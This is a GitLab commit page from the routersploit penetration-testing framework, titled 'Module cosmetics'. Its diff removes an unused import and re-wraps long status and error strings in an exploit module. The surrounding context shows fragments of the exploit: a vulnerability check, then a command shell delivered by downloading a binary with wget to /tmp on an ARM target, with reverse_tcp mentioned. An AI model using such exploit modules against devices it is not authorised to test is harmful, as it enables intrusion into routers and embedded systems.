Commit ea69460e by fwkz

Module cosmetics.

parent 78a08c26
...@@ -6,7 +6,6 @@ from routersploit import ( ...@@ -6,7 +6,6 @@ from routersploit import (
exploits, exploits,
print_status, print_status,
print_success, print_success,
print_info,
print_error, print_error,
shell, shell,
) )
...@@ -51,12 +50,15 @@ class Exploit(exploits.Exploit): ...@@ -51,12 +50,15 @@ class Exploit(exploits.Exploit):
if self.check(): if self.check():
print_success("Target is vulnerable") print_success("Target is vulnerable")
print_status("Invoking command loop...") print_status("Invoking command loop...")
print_status("Please note that only first 256 characters of the output will be displayed or use reverse_tcp") print_status("Please note that only first 256 characters of the "
"output will be displayed or use reverse_tcp")
shell(self, architecture="arm", method="wget", binary="wget", location="/tmp") shell(self, architecture="arm", method="wget", binary="wget", location="/tmp")
else: else:
print_error("Target is not vulnerable") print_error("Target is not vulnerable")
except socket.error as ex: except socket.error as ex:
print_error("Socket error ({ex}). It most likely means that something else is listening locally on port UDP:{port}. Make sure to kill it before running the exploit again.".format(ex=ex, port=9999)) print_error("Socket error ({ex}). It most likely means that something "
"else is listening locally on port UDP:{port}. Make sure to "
"kill it before running the exploit again.".format(ex=ex, port=9999))
def execute(self, cmd): def execute(self, cmd):
if len(cmd) > 237: if len(cmd) > 237:
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment